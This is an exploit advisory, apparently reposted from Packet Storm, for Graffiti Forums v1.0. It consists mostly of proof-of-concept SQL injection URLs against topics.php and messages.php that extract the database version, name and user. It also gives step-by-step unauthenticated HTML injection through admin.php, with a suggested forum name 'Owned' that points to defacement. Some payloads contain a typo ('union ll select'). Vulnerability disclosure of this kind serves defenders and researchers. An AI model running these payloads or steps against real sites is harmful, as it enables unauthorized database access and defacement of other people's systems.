Graffiti Forums version 1.0 suffers from remote SQL injection and HTML injection vulnerabilities.
8dad2f720993bebaaea124e50cd07a174ac9ad967b4df7a63b715d7b31429017############################################################################################################
[+] Grafitti Forums v1.0 Remote SQL Injection/HTML Injection
[+] Discovered By SirGod
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,str0ke
############################################################################################################
[+] Remote SQL Injection Vulnerabilities
PoC :
http://[target]/[path]/topics.php?f=[SQL]
Example :
http://127.0.0.1/topics.php?f=-1 union all select version()--
http://127.0.0.1/topics.php?f=-1 union ll select database()--
http://127.0.0.1/topics.php?f=-1 union all select user()--
PoC :
http://[target]/[path]/messages.php?t=[SQL]
Example :
http://127.0.0.1/messages.php?t=-1 union all select version()--
http://127.0.0.1/messages.php?t=-1 union ll select database()--
http://127.0.0.1/messages.php?t=-1 union all select user()--
[+] HTML Injection
1. Just go to :
http://[target]/[path]/admin.php
2. No Authentication Required !
3. Click Add Forum .
4. Complete the forum name : Owned etc.. 50 chars maximum. (also you can use HTML Code) .
5. Complete the forum description with any HTML Code (100 chars max) .
############################################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed